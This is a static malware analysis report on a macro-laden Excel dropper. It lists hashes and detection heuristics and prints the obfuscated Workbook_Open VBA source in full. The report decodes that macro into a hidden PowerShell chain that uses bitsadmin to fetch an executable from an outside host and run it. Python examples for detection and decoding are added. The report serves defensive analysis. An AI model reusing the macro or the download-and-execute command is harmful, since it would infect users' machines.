Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc2ed024c4b149af…

MALICIOUS

Office (OLE)

Size: 72.0 KB
Created: 2019-02-13 01:19:10
Authoring application: Microsoft Excel
First seen: 2019-05-31
MD5: 0344a23c93084865460f01d227ce7a28
SHA-1: dd5fe05ba0510166093a913e79a8fe1e5bdfc475
SHA-256: bc2ed024c4b149afc57f6761a176679e465a093844706068fe47e334c6a2623b
Risk score: 250

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1071.001 Web Protocols

The sample contains a Workbook_Open VBA macro whose string literals are obfuscated with a letter-only Caesar shift (the dyjLmJ(text, shift) routine in the extracted source below; digits, slashes and backslashes pass through unchanged, which is why the literals still look like URLs and paths). Decoding every literal with the macro's own routine shows that the macro does not download anything itself. It writes a two-line PowerShell script to %AppData%\DjHWFmS.ps1 that runs bitsadmin /transfer to fetch https://gotavinica.pt/output.exe into %AppData%\output.exe and then calls Start-Process on that file, and it launches the script with %SystemRoot%\System32\WindowsPowerShell\v1.0\powershell.exe -ExecutionPolicy Bypass via Shell() with window style 0 (hidden). Environ$() is used only to resolve AppData and SystemRoot. The http://www.picmonkey.com URL listed under Embedded URL comes from the document body, not from the macro, and is consistent with lure content. The chain (Excel, then powershell.exe, then bitsadmin) marks the document as a dropper/downloader stage; the payload served from the decoded URL is not part of this sample.

Heuristics (8)

  • ClamAV: Doc.Dropper.Agent-6856424-0 (critical) [CLAMAV_DETECTION]
    ClamAV detected this file as malware: Doc.Dropper.Agent-6856424-0
  • VBA macros detected (medium, 4 related findings) [OLE_VBA_MACROS]
    Document contains VBA macro code
  • Shell() call in VBA (critical) [OLE_VBA_SHELL]
  • Workbook_Open macro (high) [OLE_VBA_WBOPEN]
  • VBA p-code auto-exec with execution tokens (high) [OLE_VBA_PCODE_AUTOEXEC_EXEC]
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Environ() call (env variable access) (low) [OLE_VBA_ENVIRON]
  • Macro/content-enable lure (medium) [SE_ENABLE_LURE]
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info) [EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.picmonkey.com: in document text (OLE body)
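As an added example (not the analysis tool's own rule set), the following Python reimplements the token co-occurrence idea behind OLE_VBA_PCODE_AUTOEXEC_EXEC and runs it over two constructed string dumps: one modelled on the identifiers this sample's module must carry, one benign. The token lists are this example's own choice. The point it makes is that the Caesar shift in this sample hides what the literals say, but the names Workbook_Open, Shell and Environ are resolved by the Office host and therefore survive as identifiers even when only the compiled stream is available, so a p-code-level rule still fires when source extraction fails.

```python
import re

# Token classes modelled on the report's heuristic description; the concrete lists
# are this example's own choice, not the tool's rule set.
AUTOEXEC_TOKENS = {"Workbook_Open", "Auto_Open", "Document_Open", "AutoOpen",
                   "AutoExec", "Workbook_Activate"}
EXEC_TOKENS = {"Shell", "CreateObject", "GetObject", "URLDownloadToFile",
               "ShellExecute", "WScript.Shell", "Exec"}

# Identifier-like runs; dotted names are kept so "WScript.Shell" can match as one token.
IDENT_RE = re.compile(r"[A-Za-z_][A-Za-z0-9_.]*")


def extract_identifiers(stream_strings):
    """Collect identifier-like tokens from raw strings recovered from a p-code/cache stream."""
    found = set()
    for s in stream_strings:
        found.update(IDENT_RE.findall(s))
    return found


def autoexec_exec_hit(stream_strings):
    """Return (autoexec_matches, exec_matches), compared case-insensitively as VBA does."""
    idents = {i.lower() for i in extract_identifiers(stream_strings)}
    auto = sorted(t for t in AUTOEXEC_TOKENS if t.lower() in idents)
    execs = sorted(t for t in EXEC_TOKENS if t.lower() in idents)
    return auto, execs


def fires(stream_strings):
    """The heuristic fires only when both an auto-exec token and an execution token are present."""
    auto, execs = autoexec_exec_hit(stream_strings)
    return bool(auto) and bool(execs)


# Constructed inputs. SAMPLE_STREAM mirrors the identifiers visible in this sample's
# ThisWorkbook module (note the obfuscated literal contributes nothing useful);
# BENIGN_STREAM is a made-up harmless worksheet module for contrast.
SAMPLE_STREAM = ["ThisWorkbook", "Workbook_Open", "dyjLmJ", "Environ$", "FreeFile",
                 "Shell", "ryjiqtcyd /jhqdivuh cozer"]
BENIGN_STREAM = ["Sheet1", "Worksheet_Change", "Range", "Format", "MsgBox"]

if __name__ == "__main__":
    for name, stream in (("sample", SAMPLE_STREAM), ("benign", BENIGN_STREAM)):
        print(name, autoexec_exec_hit(stream), "fires" if fires(stream) else "clean")
```

In practice the strings would come from olevba's or oledump's dump of the module stream; the matching logic does not change, only the input source.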

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 2054 bytes
SHA-256: 4b3257f26fcbeaa7deb38f317d0c2078ee8383afd6ccd20a93f9e6692d92cfee
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Public Function dyjLmJ(fraVFh As String, LYbF As Integer) As String
    Dim sMWHgw As String
    Dim i As Integer
    Dim PUhIyUK As Integer
    Dim EiEO As Integer
    sMWHgw = fraVFh
    For i = 0 To Len(sMWHgw) - 1
        PUhIyUK = Asc(Mid(fraVFh, i + 1, 1))
        EiEO = Asc(Mid(fraVFh, i + 1, 1))
        If PUhIyUK > 64 And PUhIyUK < 91 Then
            Mid(sMWHgw, i + 1, 1) = Chr(((EiEO + LYbF - 65) Mod 26) + 65)
        ElseIf PUhIyUK > 96 And PUhIyUK < 123 Then
            Mid(sMWHgw, i + 1, 1) = Chr(((EiEO + LYbF - 97) Mod 26) + 97)
        Else
            Mid(sMWHgw, i + 1, 1) = Mid(fraVFh, i + 1, 1)
        End If
    Next i
    dyjLmJ = sMWHgw
End Function

Private Sub Workbook_Open()
    Dim lnCOKDY As String
    lnCOKDY = dyjLmJ("ryjiqtcyd /jhqdivuh cozer /temdbeqt /fhyehyjo xywx xjjfi://wejqlydysq.fj/ekjfkj.unu ", 10) & Environ$(dyjLmJ("OddRoho", 12)) & dyjLmJ("\zfeafe.pip", 15) & vbCrLf & dyjLmJ("Efmdf-Bdaoqee '", 14) & Environ$(dyjLmJ("LaaOlel", 15)) & dyjLmJ("\ionjon.yry'", 6)
    Dim yxtlfB As Integer
    yxtlfB = FreeFile
    Open Environ$(dyjLmJ("OddRoho", 12)) & dyjLmJ("\IoMBKrX.ux1", 21) For Output As #yxtlfB
    Print #yxtlfB, lnCOKDY
    Close #yxtlfB
    RetVal = Shell(Environ$(dyjLmJ("DjdepxCzze", 15)) & dyjLmJ("\Xdxyjr32\BnsitbxUtbjwXmjqq\a1.0\utbjwxmjqq.jcj -JcjhzyntsUtqnhd Gdufxx ", 21) & Environ$(dyjLmJ("CrrFcvc", 24)) & dyjLmJ("\HnLAJqW.tw1", 22), 0)
End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
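The Python below is an added example, not part of the report or of the sample. It ports the macro's dyjLmJ() routine above, applies it to every (literal, shift) pair in Workbook_Open in the order the macro concatenates them, and resolves the Environ$() lookups against a constructed stand-in environment (the paths in FAKE_ENV are assumed values, not observed ones) to reconstruct the dropped script, its path and the Shell() command line. Only the transcription of the literals is taken from the page; everything else is this example's own scaffolding.

```python
import re


def dyjLmJ(text: str, shift: int) -> str:
    """Python port of the macro's decoder: a Caesar shift over ASCII letters only.
    Digits, punctuation and path separators pass through unchanged, which is why
    the obfuscated literals still show '://', '\\' and '.xx1'-shaped suffixes."""
    out = []
    for ch in text:
        code = ord(ch)
        if 64 < code < 91:            # 'A'..'Z'
            out.append(chr((code + shift - 65) % 26 + 65))
        elif 96 < code < 123:         # 'a'..'z'
            out.append(chr((code + shift - 97) % 26 + 97))
        else:
            out.append(ch)
    return "".join(out)


# The macro's three string expressions, transcribed from Workbook_Open above as
# ordered parts: ("lit", s, k) is dyjLmJ(s, k); ("env", s, k) is Environ$(dyjLmJ(s, k));
# ("raw", s) is a plain VBA constant such as vbCrLf.
PS1_BODY = [
    ("lit", "ryjiqtcyd /jhqdivuh cozer /temdbeqt /fhyehyjo xywx xjjfi://wejqlydysq.fj/ekjfkj.unu ", 10),
    ("env", "OddRoho", 12),
    ("lit", r"\zfeafe.pip", 15),
    ("raw", "\r\n"),                  # vbCrLf
    ("lit", "Efmdf-Bdaoqee '", 14),
    ("env", "LaaOlel", 15),
    ("lit", r"\ionjon.yry'", 6),
]
PS1_PATH = [("env", "OddRoho", 12), ("lit", r"\IoMBKrX.ux1", 21)]
SHELL_CMD = [
    ("env", "DjdepxCzze", 15),
    ("lit", r"\Xdxyjr32\BnsitbxUtbjwXmjqq\a1.0\utbjwxmjqq.jcj -JcjhzyntsUtqnhd Gdufxx ", 21),
    ("env", "CrrFcvc", 24),
    ("lit", r"\HnLAJqW.tw1", 22),
]

# Constructed stand-in for the victim's environment so Environ$() resolves offline.
# These are assumed paths chosen for the example, not values observed in the sample.
FAKE_ENV = {"AppData": r"C:\Users\victim\AppData\Roaming", "SystemRoot": r"C:\Windows"}


def render(parts, env):
    """Evaluate one VBA concatenation, decoding each literal with dyjLmJ first."""
    pieces = []
    for part in parts:
        kind = part[0]
        if kind == "raw":
            pieces.append(part[1])
        elif kind == "lit":
            pieces.append(dyjLmJ(part[1], part[2]))
        elif kind == "env":
            pieces.append(env[dyjLmJ(part[1], part[2])])
        else:
            raise ValueError(f"unknown part kind {kind!r}")
    return "".join(pieces)


def decode_workbook_open(env=FAKE_ENV):
    """Reconstruct what Workbook_Open writes and executes, plus the IOCs inside it."""
    body = render(PS1_BODY, env)
    ps1_path = render(PS1_PATH, env)
    shell_cmd = render(SHELL_CMD, env)
    env_vars = sorted({dyjLmJ(p[1], p[2]) for p in PS1_BODY + PS1_PATH + SHELL_CMD
                       if p[0] == "env"})
    urls = re.findall(r"https?://[^\s'\"]+", body)
    return {
        "ps1_path": ps1_path,    # file created by Open ... For Output
        "ps1_body": body,        # its contents: bitsadmin download, then Start-Process
        "shell_cmd": shell_cmd,  # the Shell() command line (window style 0 = hidden)
        "env_vars": env_vars,    # environment variables the macro resolves
        "urls": urls,            # download URL(s) found in the dropped script
    }


if __name__ == "__main__":
    for key, value in decode_workbook_open().items():
        print(f"{key}: {value!r}")
```

Nothing here needs the cipher broken by hand: the key is the second argument of every call, so the decode is mechanical, and the fact that both .ps1 references decode to the same file name under the same AppData value is a good consistency check on the transcription. For detection, the reconstructed chain gives the telemetry to look for: Excel writing a .ps1 under %AppData%, then spawning powershell.exe with -ExecutionPolicy Bypass, then bitsadmin /transfer pulling an .exe into the same directory.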